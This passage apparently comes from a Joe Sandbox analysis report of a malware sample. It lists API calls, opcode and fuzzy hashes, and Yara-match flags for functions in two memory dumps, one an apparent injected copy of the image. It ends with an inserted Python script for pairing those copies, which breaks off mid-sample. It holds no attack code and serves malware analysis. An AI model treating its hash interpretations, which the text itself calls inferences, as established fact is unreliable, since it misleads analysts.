                                                      • Instruction Fuzzy Hash: 1BE08634940608F6CB14FA56D80EBDD77A49B01749F60C02F7899210D2DBBC96D8CF4E
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: __alldvrm$_strrchr
                                                      • String ID:
                                                      • API String ID: 1036877536-0
                                                      • Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                      • Instruction ID: 71dcccbf4812538ec1655c9b2c5f5c4a3b7cbd8a13a3613340c6ecbc00de8342
                                                      • Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                      • Instruction Fuzzy Hash: D1A13571A00B869FEB15DF18C8917AEFBE1EF59320F28426FD5859B381C23C9941C759
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __alldvrm$_strrchr
                                                      • String ID:
                                                      • API String ID: 1036877536-0
                                                      • Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                      • Instruction ID: f073b738b9a953aaab8c651964e6c629f6658bc2ae4923ea6acdb2c538974ae2
                                                      • Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                      • Instruction Fuzzy Hash: 87A14571A02786FFEB21CF28C8957AEBBE0EF56310F18816ED5859B3C1D234A941CB50
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                      • Instruction ID: cf52627d77a6a326e8967249e6afd70085c83c83b1562e4118137266a56cacff
                                                      • Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                      • Instruction Fuzzy Hash: E0412A71E00114AADB247BBBDC82AAF7A64EF4E334F14123BF818D2291D77C98095669
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                      • Instruction ID: d0064def7971556615a20dcf729324b398d92ea182547be6aa34f18b35058ce1
                                                      • Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                      • Instruction Fuzzy Hash: 0C412931A02200FBFB306FB9CC44AAE3AE5EF56734F18C616F514D63D0E6B5B54152A1
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,0470048A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 04706B61
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 04706BEA
                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 04706BFC
                                                      • __freea.LIBCMT ref: 04706C05
                                                        • Part of subcall function 0470391E: RtlAllocateHeap.NTDLL(00000000,046DDAED,00000000), ref: 04703950
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                      • String ID:
                                                      • API String ID: 2652629310-0
                                                      • Opcode ID: 6691954612650c490b0f1db7a760fe6ab7f85cafeb43cd7dd41aaf3ed81f1cf0
                                                      • Instruction ID: 81c0bac2a009b3a743c9153523f7214d423757a441dfdb9dadbed5792f107035
                                                      • Opcode Fuzzy Hash: 6691954612650c490b0f1db7a760fe6ab7f85cafeb43cd7dd41aaf3ed81f1cf0
                                                      • Instruction Fuzzy Hash: 7631AE72A0120AEBEF259F65CC54DAF7BE5EF00714B148228EC05DB290E735E964CB94
                                                      APIs
                                                      • ShowWindow.USER32(00000005), ref: 00401FBC
                                                      • UpdateWindow.USER32 ref: 00401FC4
                                                      • ShowWindow.USER32(00000000), ref: 00401FD8
                                                      • MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040203B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Window$Show$MoveUpdate
                                                      • String ID:
                                                      • API String ID: 1339878773-0
                                                      • Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                      • Instruction ID: c428200322f26a81849bf546b4fcc14a26d238e35443c7a5b73f5573142b5e50
                                                      • Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                      • Instruction Fuzzy Hash: 5B016531E006109BC7258F19ED48A267BA7FFD5717B14803AE40C972B1D7B1AC42CB5C
                                                      APIs
                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 004290F3
                                                        • Part of subcall function 00429040: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042906F
                                                        • Part of subcall function 00429040: ___AdjustPointer.LIBCMT ref: 0042908A
                                                      • _UnwindNestedFrames.LIBCMT ref: 00429108
                                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429119
                                                      • CallCatchBlock.LIBVCRUNTIME ref: 00429141
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                      • String ID:
                                                      • API String ID: 737400349-0
                                                      APIs
                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 046F935A
                                                        • Part of subcall function 046F92A7: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 046F92D6
                                                        • Part of subcall function 046F92A7: ___AdjustPointer.LIBCMT ref: 046F92F1
                                                      • _UnwindNestedFrames.LIBCMT ref: 046F936F
                                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 046F9380
                                                      • CallCatchBlock.LIBVCRUNTIME ref: 046F93A8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                      • String ID:
                                                      • API String ID: 737400349-0
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434EE6,?,00000000,00000000,00000000,?,0043519E,00000006,FlsSetValue), ref: 00434F71
                                                      • GetLastError.KERNEL32(?,00434EE6,?,00000000,00000000,00000000,?,0043519E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FBC), ref: 00434F7D
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434EE6,?,00000000,00000000,00000000,?,0043519E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F8B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad$ErrorLast
                                                      • String ID:
                                                      • API String ID: 3177248105-0
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0470514D,00000000,00000000,00000000,00000000,?,04705405,00000006,0044A378), ref: 047051D8
                                                      • GetLastError.KERNEL32(?,0470514D,00000000,00000000,00000000,00000000,?,04705405,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,04702223), ref: 047051E4
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0470514D,00000000,00000000,00000000,00000000,?,04705405,00000006,0044A378,0044A370,0044A378,00000000), ref: 047051F2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LibraryLoad$ErrorLast
                                                      • String ID:
                                                      • API String ID: 3177248105-0
                                                      APIs
                                                      • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426158
                                                      • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042616C
                                                      • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426184
                                                      • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042619C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                      • String ID:
                                                      • API String ID: 78362717-0
                                                      APIs
                                                      • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 046F63BF
                                                      • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 046F63D3
                                                      • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 046F63EB
                                                      • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 046F6403
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                      • String ID:
                                                      • API String ID: 78362717-0
                                                      APIs
                                                      • Concurrency::location::_Assign.LIBCMT ref: 046F2BC1
                                                      • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 046F2BDF
                                                        • Part of subcall function 046E8697: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 046E86B8
                                                        • Part of subcall function 046E8697: Hash.LIBCMT ref: 046E86F8
                                                      • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 046F2BE8
                                                      • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 046F2C08
                                                        • Part of subcall function 046EF6EF: Hash.LIBCMT ref: 046EF701
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                      • String ID:
                                                      • API String ID: 2250070497-0
                                                      APIs
                                                      • Concurrency::location::_Assign.LIBCMT ref: 046F2BC1
                                                      • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 046F2BDF
                                                        • Part of subcall function 046E8697: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 046E86B8
                                                        • Part of subcall function 046E8697: Hash.LIBCMT ref: 046E86F8
                                                      • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 046F2BE8
                                                      • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 046F2C08
                                                        • Part of subcall function 046EF6EF: Hash.LIBCMT ref: 046EF701
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                      • String ID:
                                                      • API String ID: 2250070497-0
                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 0040593C
                                                        • Part of subcall function 0040BB5D: __EH_prolog3_GS.LIBCMT ref: 0040BB64
                                                      • std::_Locinfo::_Locinfo.LIBCPMT ref: 00405987
                                                      • __Getcoll.LIBCPMT ref: 00405996
                                                      • std::_Locinfo::~_Locinfo.LIBCPMT ref: 004059A6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                      • String ID:
                                                      • API String ID: 1836011271-0
                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 046D50E7
                                                        • Part of subcall function 046DBDC4: __EH_prolog3_GS.LIBCMT ref: 046DBDCB
                                                      • std::_Locinfo::_Locinfo.LIBCPMT ref: 046D5132
                                                      • __Getcoll.LIBCPMT ref: 046D5141
                                                      • std::_Locinfo::~_Locinfo.LIBCPMT ref: 046D5151
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                      • String ID:
                                                      • API String ID: 1836011271-0
                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 046D5BA3
                                                        • Part of subcall function 046DBDC4: __EH_prolog3_GS.LIBCMT ref: 046DBDCB
                                                      • std::_Locinfo::_Locinfo.LIBCPMT ref: 046D5BEE
                                                      • __Getcoll.LIBCPMT ref: 046D5BFD
                                                      • std::_Locinfo::~_Locinfo.LIBCPMT ref: 046D5C0D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                      • String ID:
                                                      • API String ID: 1836011271-0
                                                      APIs
                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF39
                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF4D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Compare_exchange_acquire_4std::_
                                                      • String ID:
                                                      • API String ID: 3973403980-0
                                                      APIs
                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 046EC180
                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 046EC190
                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 046EC1A0
                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 046EC1B4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Compare_exchange_acquire_4std::_
                                                      • String ID:
                                                      • API String ID: 3973403980-0
                                                      APIs
                                                      • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110EB
                                                        • Part of subcall function 0041095D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041097F
                                                        • Part of subcall function 0041095D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 004109A0
                                                      • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 004110FE
                                                      • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 0041110A
                                                      • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411113
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                      • String ID:
                                                      • API String ID: 4284812201-0
                                                      APIs
                                                      • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413535
                                                        • Part of subcall function 004128BF: ___crtGetTimeFormatEx.LIBCMT ref: 004128D5
                                                        • Part of subcall function 004128BF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 004128F4
                                                      • GetLastError.KERNEL32 ref: 00413551
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413567
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00413575
                                                        • Part of subcall function 00412695: SetThreadPriority.KERNEL32(?,?), ref: 004126A1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                      • String ID:
                                                      • API String ID: 1674182817-0
                                                      APIs
                                                      • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 046E1352
                                                        • Part of subcall function 046E0BC4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 046E0BE6
                                                        • Part of subcall function 046E0BC4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 046E0C07
                                                      • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 046E1365
                                                      • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 046E1371
                                                      • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 046E137A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                      • String ID:
                                                      • API String ID: 4284812201-0
                                                      APIs
                                                      • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 046E379C
                                                        • Part of subcall function 046E2B26: ___crtGetTimeFormatEx.LIBCMT ref: 046E2B3C
                                                        • Part of subcall function 046E2B26: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 046E2B5B
                                                      • GetLastError.KERNEL32 ref: 046E37B8
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 046E37CE
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046E37DC
                                                        • Part of subcall function 046E28FC: SetThreadPriority.KERNEL32(?,?), ref: 046E2908
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                      • String ID:
                                                      • API String ID: 1674182817-0
                                                      • Opcode ID: 95a3cc24078eda52906d33d22a454012943d86f29ccad5a344fd010357cccaf2
                                                      • Instruction ID: 6a950a5d23b8a77eb8242d4f74f615e7aaa80d8363a550e33394da3ad1dd4139
                                                      • Opcode Fuzzy Hash: 95a3cc24078eda52906d33d22a454012943d86f29ccad5a344fd010357cccaf2
                                                      • Instruction Fuzzy Hash: D4F0A7B250131539F724B7765C06FBB37DC9B01755F54086AB955E7180FDA8F44442BC
                                                      APIs
                                                      • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 046ED098
                                                      • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 046ED0BC
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 046ED0CF
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046ED0DD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                      • String ID:
                                                      • API String ID: 3657713681-0
                                                      • Opcode ID: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
                                                      • Instruction ID: 976b36a980c042185a68bc0cdfa995b11988ceae1dac6910067a20027a48b7c2
                                                      • Opcode Fuzzy Hash: 91fe00c27762651b251d8766a9fdc76cd8d1da8bd6571df67899734432931397
                                                      • Instruction Fuzzy Hash: B8F0E93550120467C724FE56E840C7EB7F99E90B18364455ED80517285FB36B94AC669
                                                      APIs
                                                      • RegisterWaitForSingleObject.KERNEL32(?,00000000,004235A2,000000A4,000000FF,0000000C), ref: 00412618
                                                      • GetLastError.KERNEL32(?,?,?,?,004185D9,?,?,?,?,00000000,?,00000000), ref: 00412627
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041263D
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0041264B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                      • String ID:
                                                      • API String ID: 3803302727-0
                                                      • Opcode ID: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
                                                      • Instruction ID: 83bc2b2c86024c62be3f60ec6e25557cb0af9512207bfd9585c1e58ac0ecbfe1
                                                      • Opcode Fuzzy Hash: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
                                                      • Instruction Fuzzy Hash: 54F0A03460010ABBCF01EFA5DE45EEF3768AB00705F600616B614E21E1EA78DA149B68
                                                      APIs
                                                      • RegisterWaitForSingleObject.KERNEL32(?,00000000,004235A2,000000A4,000000FF,0000000C), ref: 046E287F
                                                      • GetLastError.KERNEL32(?,?,?,?,046E8840,?,?,?,?,00000000,?,00000000), ref: 046E288E
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 046E28A4
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046E28B2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                      • String ID:
                                                      • API String ID: 3803302727-0
                                                      • Opcode ID: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
                                                      • Instruction ID: 7286acd02852c8461b2bf073841a2722c5f623e2d4d1ac7684a653653c26f896
                                                      • Opcode Fuzzy Hash: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
                                                      • Instruction Fuzzy Hash: B1F0A07550020ABBDF04EFA5CD44EAF37AC6B00605F640694B510E20E0EB74E60497A8
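The two entries above (RegisterWaitForSingleObject at 00412618 in the PE-backed dump at 00400000, and again at 046E287F in the non-PE dump at 046D0000) share one Opcode ID and Opcode Fuzzy Hash but carry different Instruction IDs and Instruction Fuzzy Hashes. The same pattern repeats for the CreateEventExW, TlsAlloc, GetNumaHighestNodeNumber, SetThreadPriority and TlsSetValue entries below. The script that follows is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses entries in the layout shown on this page (bullet lines ending in `ref: <address>`, the `Memory Dump Source` line, `Opcode ID` and `Instruction ID`), groups them by Opcode ID, pairs each PE-backed function with its copy in the non-PE dump, and checks whether the copies sit at one uniform offset from their dump base. The input is a trimmed excerpt of the entries on this page; the reading of Opcode ID as an operand-insensitive function hash is an inference from those entries, not documented behaviour of the plugin, and a uniform shift is only an indication that the region is a relocated copy of the original image, to be confirmed against the dump bytes.

```python
"""Pair Joe Sandbox IDA-plugin function entries across two memory dumps.

Added example (not Joe Sandbox code). Assumes the text layout of the listing
above: an entry starts at an "APIs" line, direct API refs are bullet lines
ending in "ref: <hex>", subcall lines start with "Part of subcall", and the
"Memory Dump Source" line carries "Offset: <hex>, based on PE: true|false".
"""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed sample: a trimmed excerpt of entries from the listing above.
SAMPLE = """\
APIs
• RegisterWaitForSingleObject.KERNEL32(?,00000000,004235A2,000000A4,000000FF,0000000C), ref: 00412618
• GetLastError.KERNEL32(?,?,?,?,004185D9,?,?,?,?,00000000,?,00000000), ref: 00412627
Memory Dump Source
• Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: c7576253412bed51a53af5acb8f859d20b769276d3a1e4e3fae42923a132b8bd
• Instruction ID: 83bc2b2c86024c62be3f60ec6e25557cb0af9512207bfd9585c1e58ac0ecbfe1
APIs
• RegisterWaitForSingleObject.KERNEL32(?,00000000,004235A2,000000A4,000000FF,0000000C), ref: 046E287F
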